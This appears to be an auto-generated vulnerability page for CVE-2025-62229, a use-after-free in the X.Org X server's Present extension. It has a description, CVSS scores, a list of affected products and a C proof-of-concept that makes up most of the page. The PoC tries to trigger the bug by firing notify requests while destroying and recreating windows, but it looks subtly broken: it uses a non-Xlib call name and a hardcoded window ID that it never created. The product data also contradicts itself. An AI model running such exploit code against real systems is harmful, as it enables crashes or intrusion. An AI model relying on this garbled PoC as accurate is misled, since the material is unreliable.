Security Vulnerability Report
CVE-2025-62229 CVSS 7.3 HIGH

CVE-2025-62229

Published: 2025-10-30 06:15:45
Last Modified: 2026-04-20 14:16:12

Description

A flaw was found in the X.Org X server and Xwayland when processing X11 Present extension notifications. Improper error handling during notification creation can leave dangling pointers that lead to a use-after-free condition. This can cause memory corruption or a crash, potentially allowing an attacker to execute arbitrary code or cause a denial of service.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H

Configurations (Affected Products)

No configuration data available.

X.Org X Server < 21.1.14
Xwayland < 24.1.6
Red Hat Enterprise Linux 8.x (affected)
Red Hat Enterprise Linux 9.x (affected)
Fedora 40/41 (affected)
Debian (some versions affected)
Ubuntu 24.04 LTS (possibly affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC for CVE-2025-62229: X.Org X Server Present Extension Use-After-Free
// Compile: gcc -o poc_cve202562229 poc_cve202562229.c -lX11
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <X11/Xlib.h>
#include <X11/extensions/Xpresent.h>

#define TARGET_WINDOW 0x12345678 // Target window ID

void trigger_uaf(Display *dpy) {
    int event_base, error_base;

    // Check if Present extension is available
    if (!XPresentQueryExtension(dpy, &event_base, &error_base)) {
        printf("[-] Present extension not available\n");
        return;
    }
    printf("[+] Present extension available\n");

    // Trigger the UAF condition through rapid notification creation
    for (int i = 0; i < 100; i++) {
        // Create PresentNotifyMSC request
        CARD32 options = 0;
        CARD64 target_msc = 0;
        CARD64 divisor = 0;
        CARD64 remainder = 0;

        // Rapid fire requests to trigger race condition
        PresentNotifyMSC(dpy, TARGET_WINDOW, options, target_msc, divisor, remainder);

        // Immediately destroy window to create dangling pointer
        XDestroyWindow(dpy, TARGET_WINDOW);
        XFlush(dpy);

        // Re-create window
        XCreateWindow(dpy, DefaultRootWindow(dpy), 0, 0, 800, 600, 0,
                      CopyFromParent, InputOutput, CopyFromParent, 0, NULL);
    }
    printf("[+] UAF condition triggered\n");
}

int main(int argc, char *argv[]) {
    Display *dpy = XOpenDisplay(NULL);
    if (!dpy) {
        fprintf(stderr, "[-] Cannot open display\n");
        return 1;
    }
    printf("[+] Connecting to X server: %s\n", XDisplayName(NULL));
    trigger_uaf(dpy);
    XCloseDisplay(dpy);
    return 0;
}

References

Raw JSON Data
